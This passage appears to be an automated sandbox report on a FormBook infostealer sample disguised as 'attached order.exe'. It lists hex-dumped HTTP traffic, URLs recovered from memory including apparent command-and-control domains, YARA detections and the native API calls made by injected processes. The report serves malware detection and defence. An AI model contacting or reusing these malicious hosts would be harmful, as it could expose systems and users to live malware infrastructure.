33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 27 Nov 2024 10:30:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                      Source: RAVCpl64.exe, 00000004.00000002.17803569863.00000000065DC000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.000000000406C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQ
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, attached order.exe, 00000000.00000002.16557711789.00000000033DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/_prof_basesDataSet.xsd
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/_prof_basesDataSet1.xsd
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/activity/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/album/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/channel/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/group/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                      Source: RAVCpl64.exe, 00000004.00000002.17797622157.0000000003629000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.1qcczjvh2.autos
                      Source: RAVCpl64.exe, 00000004.00000002.17797622157.0000000003629000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.1qcczjvh2.autos/pfw9/
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: RAVCpl64.exe, 00000004.00000002.17803569863.000000000644A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.0000000003EDA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                      Source: RAVCpl64.exe, 00000004.00000002.17803569863.000000000644A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.0000000003EDA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                      Source: t577G2K6.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: t577G2K6.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: cacls.exe, 00000005.00000003.17056037329.000000000093D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                      Source: cacls.exe, 00000005.00000003.17056037329.000000000093D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                      Source: cacls.exe, 00000005.00000003.17056037329.000000000093D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                      Source: cacls.exe, 00000005.00000002.17793373650.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                      Source: cacls.exe, 00000005.00000002.17793373650.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                      Source: cacls.exe, 00000005.00000003.17055085856.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: attached order.exe
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0042CE23 NtClose,3_2_0042CE23
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_01772BC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01772B90
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772A80 NtClose,LdrInitializeThunk,3_2_01772A80
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_01772D10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01772EB0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017734E0 NtCreateMutant,LdrInitializeThunk,3_2_017734E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01774260 NtSetContextThread,3_2_01774260
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01774570 NtSuspendThread,3_2_01774570
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017729F0 NtReadFile,3_2_017729F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017729D0 NtWaitForSingleObject,3_2_017729D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772B20 NtQueryInformationProcess,3_2_01772B20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772B10 NtAllocateVirtualMemory,3_2_01772B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772B00 NtQueryValueKey,3_2_01772B00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772BE0 NtQueryVirtualMemory,3_2_01772BE0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772B80 NtCreateKey,3_2_01772B80
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772A10 NtWriteFile,3_2_01772A10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772AC0 NtEnumerateValueKey,3_2_01772AC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772AA0 NtQueryInformationFile,3_2_01772AA0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772D50 NtWriteVirtualMemory,3_2_01772D50
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772DC0 NtAdjustPrivilegesToken,3_2_01772DC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772DA0 NtReadVirtualMemory,3_2_01772DA0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772C50 NtUnmapViewOfSection,3_2_01772C50
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772C30 NtMapViewOfSection,3_2_01772C30
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772C20 NtSetInformationFile,3_2_01772C20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772C10 NtOpenProcess,3_2_01772C10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772CF0 NtDelayExecution,3_2_01772CF0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772CD0 NtEnumerateKey,3_2_01772CD0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772F30 NtOpenDirectoryObject,3_2_01772F30
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772F00 NtCreateFile,3_2_01772F00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772FB0 NtSetValueKey,3_2_01772FB0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772E50 NtCreateSection,3_2_01772E50
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772E00 NtQueueApcThread,3_2_01772E00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772ED0 NtResumeThread,3_2_01772ED0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772EC0 NtQuerySection,3_2_01772EC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772E80 NtCreateProcessEx,3_2_01772E80
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017738D0 NtGetContextThread,3_2_017738D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01773C30 NtOpenProcessToken,3_2_01773C30
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01773C90 NtOpenThread,3_2_01773C90
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02F22AC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22A80 NtClose,LdrInitializeThunk,5_2_02F22A80
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22A10 NtWriteFile,LdrInitializeThunk,5_2_02F22A10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_02F22BC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02F22B90
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22B80 NtCreateKey,LdrInitializeThunk,5_2_02F22B80
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F22B10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22B00 NtQueryValueKey,LdrInitializeThunk,5_2_02F22B00
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F229F0 NtReadFile,LdrInitializeThunk,5_2_02F229F0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22E50 NtCreateSection,LdrInitializeThunk,5_2_02F22E50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22F00 NtCreateFile,LdrInitializeThunk,5_2_02F22F00
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22CF0 NtDelayExecution,LdrInitializeThunk,5_2_02F22CF0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C30 NtMapViewOfSection,LdrInitializeThunk,5_2_02F22C30
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_02F22D10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F234E0 NtCreateMutant,LdrInitializeThunk,5_2_02F234E0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F24260 NtSetContextThread,5_2_02F24260
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F24570 NtSuspendThread,5_2_02F24570
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22AA0 NtQueryInformationFile,5_2_02F22AA0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22BE0 NtQueryVirtualMemory,5_2_02F22BE0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22B20 NtQueryInformationProcess,5_2_02F22B20
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F229D0 NtWaitForSingleObject,5_2_02F229D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22ED0 NtResumeThread,5_2_02F22ED0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22EC0 NtQuerySection,5_2_02F22EC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22EB0 NtProtectVirtualMemory,5_2_02F22EB0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22E80 NtCreateProcessEx,5_2_02F22E80
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22E00 NtQueueApcThread,5_2_02F22E00
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22FB0 NtSetValueKey,5_2_02F22FB0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22F30 NtOpenDirectoryObject,5_2_02F22F30
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22CD0 NtEnumerateKey,5_2_02F22CD0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C50 NtUnmapViewOfSection,5_2_02F22C50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C20 NtSetInformationFile,5_2_02F22C20
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C10 NtOpenProcess,5_2_02F22C10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22DC0 NtAdjustPrivilegesToken,5_2_02F22DC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22DA0 NtReadVirtualMemory,5_2_02F22DA0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22D50 NtWriteVirtualMemory,5_2_02F22D50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F238D0 NtGetContextThread,5_2_02F238D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F23C90 NtOpenThread,5_2_02F23C90
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F23C30 NtOpenProcessToken,5_2_02F23C30
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_00689560 NtCreateFile,5_2_00689560
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006896D0 NtReadFile,5_2_006896D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006897D0 NtDeleteFile,5_2_006897D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_00689870 NtClose,5_2_00689870
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006899D0 NtAllocateVirtualMemory,5_2_006899D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C37E9 NtSuspendThread,5_2_032C37E9
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C4528 NtMapViewOfSection,5_2_032C4528
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C34C9 NtSetContextThread,5_2_032C34C9
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C3B0A NtResumeThread,5_2_032C3B0A
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BF813 NtMapViewOfSection,5_2_032BF813
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BF8BA NtUnmapViewOfSection,5_2_032BF8BA
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C48F1 NtUnmapViewOfSection,5_2_032C48F1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB26980_2_01AB2698
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB34E00_2_01AB34E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB14080_2_01AB1408
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB1C980_2_01AB1C98
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB21300_2_01AB2130
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB44200_2_01AB4420
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB44120_2_01AB4412
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB08700_2_01AB0870
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB13580_2_01AB1358
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB34000_2_01AB3400
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB16F10_2_01AB16F1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB56620_2_01AB5662
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB56700_2_01AB5670
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB58280_2_01AB5828
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB58180_2_01AB5818
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB5AA00_2_01AB5AA0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_01AB5A910_2_01AB5A91
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A3CFE80_2_05A3CFE8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A3CFF80_2_05A3CFF8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A357C80_2_05A357C8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A357D80_2_05A357D8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_05A338940_2_05A33894
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_09E55E940_2_09E55E94
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_09E57B080_2_09E57B08
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_09E55E860_2_09E55E86
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0A321F240_2_0A321F24
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0A323F400_2_0A323F40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0A3200060_2_0A320006
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0A3200400_2_0A320040
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7AF200_2_0BA7AF20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA733380_2_0BA73338
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7EBBB0_2_0BA7EBBB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7EBC80_2_0BA7EBC8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7DEEA0_2_0BA7DEEA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA733270_2_0BA73327
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7E3490_2_0BA7E349
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7E3580_2_0BA7E358
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA730410_2_0BA73041
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA730500_2_0BA73050
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7E7800_2_0BA7E780
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 0_2_0BA7E7900_2_0BA7E790
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00418CB33_2_00418CB3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040E81C3_2_0040E81C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004033303_2_00403330
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004013E03_2_004013E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0042F4733_2_0042F473
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004024FF3_2_004024FF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004104833_2_00410483
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004025003_2_00402500
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040E6833_2_0040E683
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004106A33_2_004106A3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00416EB33_2_00416EB3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004027043_2_00402704
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040270F3_2_0040270F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_004027103_2_00402710
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040E7CA3_2_0040E7CA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0040E7D33_2_0040E7D3
